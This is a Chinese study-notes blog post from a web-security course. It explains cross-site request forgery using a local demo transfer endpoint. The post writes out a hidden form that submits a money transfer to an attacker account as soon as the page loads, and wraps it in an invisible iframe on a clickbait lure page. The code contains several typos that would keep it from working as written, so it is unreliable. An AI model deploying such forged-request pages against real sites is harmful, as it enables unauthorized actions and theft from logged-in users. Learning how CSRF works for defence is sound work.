网易云课堂web安全学习第六天——了解CSRF

第一

        CSRF漏洞是什么

              利用用户已登陆的身份,在用户不知情的情况下,已=以用户的名义完成非法操作。比如恶意留言等

 

第二

        CSRF漏洞的原理

               攻击者构造恶意界面    恶意界面的内容是从登陆账户转账至攻击者账户     用户主动访问,完成转账

             

转账操作的http网络包

Request URL:http://127.0.0.1:8080/demo/csrf/transfer.php  //这个是转账的url



Cookie:PHPSESSID=hsrccuemrdugv6k09ebs94ojj10   //用户的cookie,会存放用户的登陆凭证


Form Data view source    view URL encoded

toUser: 小红  //被转账人信息
amount:10   //转账钱数
打开页面自动完成转账的恶意代码页面

<body onload="submitForm();">  
//onload 在页面或者图像加载完成后立即发生。 全句意思是自动提交表单

     <div class="tip">加载中,请稍后...</div>
   
     <form id="transferFrom"
           action="http://127.0.0.1:8080/demo/csrf/transfer.php"  //转账地址
           method="post">
              <input type="hidden" name="toUser" value="黑客" />  
                                                          /*value属性为input元素设定值*/
              <input type="hidden" name="amount" value="10" />
     </from>
</body>

//以下代码,提交表单
<script>
       function submitFrom()
            (
              document.getElementtById("transferFrom").submit();
             )
</script>
用iframe弥补from表单提交有明显的页面跳转问题用iframe

<html>
<head>
<meta http-equiv="Content" content="text/html; charset=UTF-8">
<title>琉璃神社绝版写真,不进来看看吗?</title>
 <style>
     body  {background: url("liuli.jpg") repest:}
 </style>
</head>

<body>
      <iframe src="csrf-attack.php?t=0.98733248669" width=0 height=0></iframe>
        /*这个src=""的链接就是自动完成转账的恶意代码页面*/
</body>
</html>

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值